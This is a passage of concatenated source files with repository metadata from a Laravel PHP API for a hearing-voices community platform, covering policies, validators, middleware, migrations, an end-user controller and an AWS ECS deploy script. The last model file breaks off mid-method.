"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1173,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 61,
"path": "/app/Policies/TagPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\Tag;\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass TagPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list tags.\n *\n * @param \\App\\Models\\User|null $user\n * @return bool\n */\n public function list(?User $user): bool\n {\n return true;\n }\n\n /**\n * Determine whether the user can view the tag.\n *\n * @param \\App\\Models\\User|null $user\n * @param \\App\\Models\\Tag $tag\n * @return bool\n */\n public function view(?User $user, Tag $tag): bool\n {\n return true;\n }\n\n /**\n * Determine whether the user can create the tag.\n *\n * @param \\App\\Models\\User $user\n *\n * @return bool\n */\n public function create(User $user): bool\n {\n return $user->isAdmin();\n }\n\n /**\n * Determine whether the user can delete the tag.\n *\n * @param \\App\\Models\\User $user\n * @param \\App\\Models\\Tag $tag\n * @return bool\n */\n public function delete(User $user, Tag $tag): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.7347972989082336,
"alphanum_fraction": 0.7398648858070374,
"avg_line_length": 25.909090042114258,
"blob_id": "c53df038b5d0811e66e9afe44712b3880d89d575",
"content_id": "fc80e78c07db63ac8826dc0ece507364445b3bdf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 592,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 22,
"path": "/app/Docs/Components.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse App\\Docs\\SecuritySchemes\\OAuth2SecurityScheme;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Components as BaseComponents;\n\nclass Components extends BaseComponents\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Components\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->securitySchemes(OAuth2SecurityScheme::create());\n }\n}\n"
},
{
"alpha_fraction": 0.502109706401825,
"alphanum_fraction": 0.5164557099342346,
"avg_line_length": 28.625,
"blob_id": "f8a5d53d9e926fa9fe985f9c68efaaf4c05e5254",
"content_id": "b4f55dac841516707594074e2648cfb3d76ccb1f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1185,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 40,
"path": "/app/Http/Requests/EndUser/UpdateEndUserRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\EndUser;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Validation\\Rule;\n\nclass UpdateEndUserRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'email' => [\n 'bail',\n 'email',\n 'max:255',\n Rule::unique('users')->ignore($this->end_user->user_id),\n ],\n 'password' => ['bail', 'string', 'min:1', 'max:255'],\n 'country' => ['bail', 'string', 'max:255'],\n 'birth_year' => [\n 'bail',\n 'integer',\n Rule::min(Date::today()->year - Config::get('connecting_voices.age_requirement.max')),\n Rule::max(Date::today()->year - Config::get('connecting_voices.age_requirement.min')),\n ],\n 'gender' => ['bail', 'string', 'max:255'],\n 'ethnicity' => ['bail', 'string', 'max:255'],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6094594597816467,
"alphanum_fraction": 0.6101351380348206,
"avg_line_length": 25.428571701049805,
"blob_id": "53ad340c4fed16fa884aeac6905a1045f0241eca",
"content_id": "e1b00d60b3f8fe30160dfe8ba73137d66137c2a0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1480,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 56,
"path": "/app/Http/Middleware/Authenticate.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Middleware;\n\nuse Illuminate\\Auth\\Middleware\\Authenticate as Middleware;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Str;\n\nclass Authenticate extends Middleware\n{\n /**\n * Get the path the user should be redirected to when they are not authenticated.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return string|void\n */\n protected function redirectTo($request)\n {\n if ($request->expectsJson()) {\n return;\n }\n\n return $this->isForAdmin($request)\n ? route('auth.admin.login')\n : route('auth.end-user.login');\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return bool\n */\n protected function isForAdmin(Request $request): bool\n {\n // Check if the request contains an OAuth redirect URI for the admin web app.\n return Str::contains(\n $request->input('redirect_uri', ''),\n Config::get('connecting_voices.admin_url')\n );\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return bool\n */\n protected function isForEndUser(Request $request): bool\n {\n // Check if the request contains an OAuth redirect URI for the frontend web app.\n return Str::contains(\n $request->input('redirect_uri', ''),\n Config::get('connecting_voices.frontend_url')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5983999967575073,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 15.447368621826172,
"blob_id": "3c741c9ab76d1f6b373df5eeecfa9a0a624c25f1",
"content_id": "f78b4e17cfaf00033bd06e1812a2da20d93b0891",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 625,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 38,
"path": "/app/Events/Admin/AdminCreated.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Admin;\n\nuse App\\Models\\Admin;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass AdminCreated\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Admin\n */\n protected $admin;\n\n /**\n * AdminCreated constructor.\n *\n * @param \\App\\Models\\Admin $admin\n */\n public function __construct(Admin $admin)\n {\n $this->admin = $admin;\n }\n\n /**\n * @return \\App\\Models\\Admin\n */\n public function getAdmin(): Admin\n {\n return $this->admin;\n }\n}\n"
},
{
"alpha_fraction": 0.5722379684448242,
"alphanum_fraction": 0.5736544132232666,
"avg_line_length": 21.0625,
"blob_id": "f724d38e3da11c5a6b811e5269f7e7b98da88626",
"content_id": "b4c1f6d5338232a6b181cdf6d7a5d80069efe533",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 706,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 32,
"path": "/database/migrations/2019_05_31_100107_add_indexes_to_admins_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass AddIndexesToAdminsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::table('admins', function (Blueprint $table): void {\n $table->index('name');\n $table->index('phone');\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::table('admins', function (Blueprint $table): void {\n $table->dropIndex(['name']);\n $table->dropIndex(['phone']);\n });\n }\n}\n"
},
{
"alpha_fraction": 0.59375,
"alphanum_fraction": 0.595588207244873,
"avg_line_length": 21.66666603088379,
"blob_id": "2a6971a6ce35a36f04a8cded2e7ba10798b4048c",
"content_id": "812d87ff4449c43772556c846cff94e6590a6828",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 544,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 24,
"path": "/app/Http/Requests/EndUser/IndexEndUserRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\EndUser;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass IndexEndUserRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'filter[email_verified]' => ['bail', Rule::in(['true', 'false', 'all'])],\n 'filter[with_soft_deletes]' => ['bail', Rule::in(['true', 'false'])],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5838218331336975,
"alphanum_fraction": 0.5849941372871399,
"avg_line_length": 24.08823585510254,
"blob_id": "8d3b4b8ed60ac4471b41523ad4d8d66ce2b0378e",
"content_id": "8d0b1019747bd90adce93b7d39f484790c091780",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 853,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 34,
"path": "/database/migrations/2019_12_09_184725_remove_unique_constraint_from_end_user_id_column_on_contributions_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass RemoveUniqueConstraintFromEndUserIdColumnOnContributionsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::table('contributions', function (Blueprint $table): void {\n $table->dropForeign(['end_user_id']);\n $table->dropUnique(['end_user_id']);\n $table->foreign('end_user_id')\n ->references('id')\n ->on('end_users');\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::table('contributions', function (Blueprint $table) {\n $table->unique('end_user_id');\n });\n }\n}\n"
},
{
"alpha_fraction": 0.6481481194496155,
"alphanum_fraction": 0.6507936716079712,
"avg_line_length": 24.200000762939453,
"blob_id": "607544df4880ebcf4652d40f9b66cbf1dce44b1a",
"content_id": "abe13fdd173ffff4749dc6fb85dbe9e93d63b6b1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 378,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 15,
"path": "/database/factories/NotificationFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\Notification;\nuse Faker\\Generator as Faker;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(Notification::class, function (Faker $faker): array {\n return [\n 'channel' => Notification::CHANNEL_EMAIL,\n 'recipient' => $faker->safeEmail,\n 'content' => $faker->sentence,\n ];\n});\n"
},
{
"alpha_fraction": 0.6845637559890747,
"alphanum_fraction": 0.6868008971214294,
"avg_line_length": 17.625,
"blob_id": "7a8230d6aadf063bed9d241fcf3b3b43e51ddf19",
"content_id": "5679f614273102541d6e054a65104bc7b86d2f86",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 447,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 24,
"path": "/app/Models/Tag.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Database\\Eloquent\\SoftDeletes;\n\nclass Tag extends Model\n{\n use Mutators\\TagMutators;\n use Relationships\\TagRelationships;\n use Scopes\\TagScopes;\n use SoftDeletes;\n\n /**\n * @return bool\n */\n public function isTopLevel(): bool\n {\n return $this->parent_tag_id === null;\n }\n}\n"
},
{
"alpha_fraction": 0.5641025900840759,
"alphanum_fraction": 0.5666666626930237,
"avg_line_length": 18.5,
"blob_id": "8acdb033aca1dba126294706e37d5568c232bf01",
"content_id": "a0247ae631801cd4e4f72bc66a334ac125308f0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 390,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 20,
"path": "/app/Sms/LogSmsSender.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Sms;\n\nclass LogSmsSender implements SmsSender\n{\n /**\n * Sends an SMS.\n *\n * @param string $from\n * @param string $to\n * @param string $body\n */\n public function send(string $from, string $to, string $body): void\n {\n logger()->debug(\"Sms sent from [{$from}] to [{$to}] with message [{$body}].\");\n }\n}\n"
},
{
"alpha_fraction": 0.5687500238418579,
"alphanum_fraction": 0.5718749761581421,
"avg_line_length": 15,
"blob_id": "a063b0527c8bd883998dd7dfbc738239c020657e",
"content_id": "6f1b535e9f16ac483aaa522eefec067b97fefd1b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 320,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 20,
"path": "/app/Sms/NullSmsSender.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Sms;\n\nclass NullSmsSender implements SmsSender\n{\n /**\n * Sends an SMS.\n *\n * @param string $from\n * @param string $to\n * @param string $body\n */\n public function send(string $from, string $to, string $body): void\n {\n return;\n }\n}\n"
},
{
"alpha_fraction": 0.6376370191574097,
"alphanum_fraction": 0.6382460594177246,
"avg_line_length": 23.147058486938477,
"blob_id": "0dbf62f952ed95d1a1dbe3f38d64b0c41ff60338",
"content_id": "41562adc6c861cbe0aa7813571f0b828b0c2de94",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1642,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 68,
"path": "/app/Http/Controllers/ApiController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Support\\Pagination;\nuse Illuminate\\Foundation\\Auth\\Access\\AuthorizesRequests;\nuse Illuminate\\Foundation\\Bus\\DispatchesJobs;\nuse Illuminate\\Foundation\\Validation\\ValidatesRequests;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Routing\\Controller as BaseController;\nuse Illuminate\\Support\\Facades\\Auth;\nuse Illuminate\\Support\\Facades\\Config;\n\nabstract class ApiController extends BaseController\n{\n use AuthorizesRequests {\n AuthorizesRequests::resourceAbilityMap as baseResourceAbilityMap;\n }\n use DispatchesJobs;\n use ValidatesRequests;\n\n /**\n * @var int\n */\n protected $perPage;\n\n /**\n * Controller constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n $this->perPage = $pagination->perPage(\n $this->getPerPage($request)\n );\n\n Auth::shouldUse('api');\n }\n\n /**\n * Overridden to add the index method to the map.\n *\n * @return array\n */\n protected function resourceAbilityMap(): array\n {\n return array_merge([\n 'list' => 'list',\n 'index' => 'list',\n ], $this->baseResourceAbilityMap());\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return int\n */\n protected function getPerPage(Request $request): int\n {\n return (int)$request->input(\n 'per_page',\n Config::get('connecting_voices.pagination.default')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5728155374526978,
"alphanum_fraction": 0.5841423869132996,
"avg_line_length": 18.3125,
"blob_id": "2ece28ec7b0ad8490b432f7d5c2b8f96b340541d",
"content_id": "3b8b4852bea8b644dad0db5def55794f3d6249f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 618,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 32,
"path": "/app/Rules/UkPhoneNumber.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Rules;\n\nuse Illuminate\\Contracts\\Validation\\Rule;\n\nclass UkPhoneNumber implements Rule\n{\n /**\n * Determine if the validation rule passes.\n *\n * @param string $attribute\n * @param string $phone\n * @return bool\n */\n public function passes($attribute, $phone): bool\n {\n return preg_match('/^(0[0-9]{10})$/', $phone) === 1;\n }\n\n /**\n * Get the validation error message.\n *\n * @return string\n */\n public function message(): string\n {\n return 'The :attribute must be a valid UK phone number.';\n }\n}\n"
},
{
"alpha_fraction": 0.5851119160652161,
"alphanum_fraction": 0.5871941447257996,
"avg_line_length": 21.080459594726562,
"blob_id": "419f9d97fea796ee5920cbe888881709b3699d83",
"content_id": "f6ebf429f3a0d1dee85c0dd0660e0789f3a7a3e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1921,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 87,
"path": "/app/Models/Contribution.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse App\\Support\\Markdown;\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Support\\Str;\n\nclass Contribution extends Model\n{\n use Mutators\\ContributionMutators;\n use Relationships\\ContributionRelationships;\n use Scopes\\ContributionScopes;\n\n const STATUS_PUBLIC = 'public';\n const STATUS_PRIVATE = 'private';\n const STATUS_IN_REVIEW = 'in_review';\n const STATUS_CHANGES_REQUESTED = 'changes_requested';\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'status_last_updated_at' => 'datetime',\n 'created_at' => 'datetime',\n 'updated_at' => 'datetime',\n ];\n\n /**\n * @return bool\n */\n public function isPublic(): bool\n {\n return $this->status === static::STATUS_PUBLIC;\n }\n\n /**\n * @return bool\n */\n public function isPrivate(): bool\n {\n return $this->status === static::STATUS_PRIVATE;\n }\n\n /**\n * @return bool\n */\n public function isInReview(): bool\n {\n return $this->status === static::STATUS_IN_REVIEW;\n }\n\n /**\n * @return bool\n */\n public function isChangesRequested(): bool\n {\n return $this->status === static::STATUS_CHANGES_REQUESTED;\n }\n\n /**\n * @param \\App\\Models\\EndUser $endUser\n * @return bool\n */\n public function belongsToEndUser(EndUser $endUser): bool\n {\n return $this->end_user_id === $endUser->id;\n }\n\n /**\n * @return string\n */\n public function getExcerpt(): string\n {\n // TODO: Apply better logic here so words aren't cut off.\n\n /** @var \\App\\Support\\Markdown $markdown */\n $markdown = app()->get(Markdown::class);\n $content = $markdown->strip($this->content);\n\n return Str::limit($content, 125);\n }\n}\n"
},
{
"alpha_fraction": 0.6635730862617493,
"alphanum_fraction": 0.6693735718727112,
"avg_line_length": 29.785715103149414,
"blob_id": "0805ed3c2ad4f8a21a57ecb613a03944b6270f5a",
"content_id": "99301ab11b33872621979d53cf990eddfadeb7a8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 862,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 28,
"path": "/app/Docs/SecuritySchemes/OAuth2SecurityScheme.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\SecuritySchemes;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\OAuthFlow;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\SecurityScheme;\n\nclass OAuth2SecurityScheme extends SecurityScheme\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\SecurityScheme\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create('OAuth2')\n ->type(static::TYPE_OAUTH2)\n ->description('The standard OAuth2 authentication')\n ->flows(\n OAuthFlow::create()\n ->flow(OAuthFlow::FLOW_IMPLICIT)\n ->authorizationUrl(route('passport.authorizations.authorize'))\n );\n }\n}\n"
},
{
"alpha_fraction": 0.614478349685669,
"alphanum_fraction": 0.6147884130477905,
"avg_line_length": 34.64088439941406,
"blob_id": "ff4c874ebfa020e5262796770a9e1451f1bc1704",
"content_id": "75924c7319f2395983e8bffcc5c725b26429e423",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 6451,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 181,
"path": "/app/Http/Controllers/V1/EndUserController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\EndUser\\EmailFilter;\nuse App\\Http\\Filters\\EndUser\\EmailVerifiedFilter;\nuse App\\Http\\Filters\\NullFilter;\nuse App\\Http\\Requests\\EndUser\\DestroyEndUserRequest;\nuse App\\Http\\Requests\\EndUser\\IndexEndUserRequest;\nuse App\\Http\\Requests\\EndUser\\StoreEndUserRequest;\nuse App\\Http\\Requests\\EndUser\\UpdateEndUserRequest;\nuse App\\Http\\Resources\\EndUserResource;\nuse App\\Http\\Responses\\ResourceDeletedResponse;\nuse App\\Http\\Sorts\\EndUser\\EmailSort;\nuse App\\Models\\EndUser;\nuse App\\Services\\EndUserService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\nuse Spatie\\QueryBuilder\\Sort;\n\nclass EndUserController extends ApiController\n{\n /**\n * @var \\App\\Services\\EndUserService\n */\n protected $endUserService;\n\n /**\n * EndUserController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\EndUserService $endUserService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n EndUserService $endUserService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified'])->except('store');\n $this->authorizeResource(EndUser::class);\n\n $this->endUserService = $endUserService;\n }\n\n /**\n * @param \\App\\Http\\Requests\\EndUser\\IndexEndUserRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(IndexEndUserRequest $request): ResourceCollection\n {\n $baseQuery = EndUser::query()\n ->with('user')\n // When soft deleted users aren't included, then only get end users with an active user.\n ->when(\n $request->doesntHaveFilter('with_soft_deletes', 'true'),\n function (Builder $query) use ($request): void {\n $query->whereHas('user', function (Builder $query): void {\n $query->whereNull('users.deleted_at');\n });\n }\n )\n ->withCount(\n 'contributions',\n 'publicContributions',\n 'privateContributions',\n 'inReviewContributions',\n 'changesRequestedContributions'\n );\n\n $endUsers = QueryBuilder::for($baseQuery)\n ->allowedFilters(\n Filter::exact('id'),\n Filter::custom('email', EmailFilter::class),\n Filter::custom('email_verified', EmailVerifiedFilter::class),\n Filter::custom('with_soft_deletes', NullFilter::class)\n )\n ->allowedSorts([\n Sort::custom('email', EmailSort::class),\n ])\n ->defaultSort(\n Sort::custom('email', EmailSort::class)\n )\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all end users.'));\n\n return EndUserResource::collection($endUsers);\n }\n\n /**\n * @param \\App\\Http\\Requests\\EndUser\\StoreEndUserRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function store(StoreEndUserRequest $request): JsonResource\n {\n $endUser = DB::transaction(function () use ($request): EndUser {\n return $this->endUserService->create([\n 'email' => $request->email,\n 'password' => $request->password,\n 'country' => $request->country,\n 'birth_year' => $request->birth_year,\n 'gender' => 
$request->gender,\n 'ethnicity' => $request->ethnicity,\n ]);\n });\n\n event(EndpointInvoked::onCreate($request, \"Created end user [{$endUser->id}].\"));\n\n return new EndUserResource($endUser);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\EndUser $endUser\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, EndUser $endUser): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed end user [{$endUser->id}].\"));\n\n return new EndUserResource($endUser);\n }\n\n /**\n * @param \\App\\Http\\Requests\\EndUser\\UpdateEndUserRequest $request\n * @param \\App\\Models\\EndUser $endUser\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function update(UpdateEndUserRequest $request, EndUser $endUser): JsonResource\n {\n $endUser = DB::transaction(function () use ($request, $endUser): EndUser {\n return $this->endUserService->update($endUser, [\n 'email' => $request->email,\n 'password' => $request->password,\n 'country' => $request->country,\n 'birth_year' => $request->birth_year,\n 'gender' => $request->gender,\n 'ethnicity' => $request->ethnicity,\n ]);\n });\n\n event(EndpointInvoked::onUpdate($request, \"Updated end user [{$endUser->id}].\"));\n\n return new EndUserResource($endUser);\n }\n\n /**\n * @param \\App\\Http\\Requests\\EndUser\\DestroyEndUserRequest $request\n * @param \\App\\Models\\EndUser $endUser\n * @return \\App\\Http\\Responses\\ResourceDeletedResponse\n */\n public function destroy(\n DestroyEndUserRequest $request,\n EndUser $endUser\n ): ResourceDeletedResponse {\n DB::transaction(function () use ($request, $endUser): void {\n $request->type === DestroyEndUserRequest::TYPE_FORCE_DELETE\n ? $this->endUserService->forceDelete($endUser)\n : $this->endUserService->softDelete($endUser);\n });\n\n $request->type === DestroyEndUserRequest::TYPE_FORCE_DELETE\n ? event(EndpointInvoked::onDelete($request, \"Force deleted end user [{$endUser->id}].\"))\n : event(EndpointInvoked::onDelete($request, \"Soft deleted end user [{$endUser->id}].\"));\n\n return new ResourceDeletedResponse('end user');\n }\n}\n"
},
{
"alpha_fraction": 0.6824644804000854,
"alphanum_fraction": 0.6824644804000854,
"avg_line_length": 24.31999969482422,
"blob_id": "d36b8e0f5345c9452ff9fe603d3fc8be81338e4f",
"content_id": "4334eeaf6635a494fd0e4c4a987bd656b08f1f94",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 633,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 25,
"path": "/docker/deploy.sh",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Requires the following environment variables:\n# $REPO_URI = The URI of the Docker repo to push to.\n# $CLUSTER = The name of the ECS cluster.\n# $SERVICE = The name of the ECS service.\n\n# Bail out on first error.\nset -e\n\n# Login to the ECR.\necho \"Logging in to ECR...\"\n$(aws ecr get-login --no-include-email)\n\n# Push the Docker image to ECR.\necho \"Pushing images to ECR...\"\ndocker push ${REPO_URI}:latest\n# docker push ${REPO_URI}:${TRAVIS_COMMIT}\n\n# Update the service.\necho \"Updating the ECS service...\"\naws ecs update-service \\\n --cluster ${CLUSTER} \\\n --service ${SERVICE} \\\n --force-new-deployment\n"
},
{
"alpha_fraction": 0.6434205174446106,
"alphanum_fraction": 0.6446658372879028,
"avg_line_length": 28.740739822387695,
"blob_id": "d1ecee51ad4843528fb81f20aac35758071c6a56",
"content_id": "7a7c638e2490892160ce2836d807389963f7f9de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2409,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 81,
"path": "/app/Models/EndUser.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse App\\Mail\\TemplateMail;\nuse App\\VariableSubstitution\\Email\\EndUser\\EmailConfirmationSubstituter;\nuse App\\VariableSubstitution\\Email\\EndUser\\PasswordResetSubstituter;\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Foundation\\Bus\\DispatchesJobs;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\URL;\n\nclass EndUser extends Model\n{\n use Mutators\\EndUserMutators;\n use Relationships\\EndUserRelationships;\n use Scopes\\EndUserScopes;\n use DispatchesJobs;\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'gdpr_consented_at' => 'datetime',\n ];\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * Send the password reset notification.\n *\n * @param string $token\n */\n public function sendPasswordResetNotification($token): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n 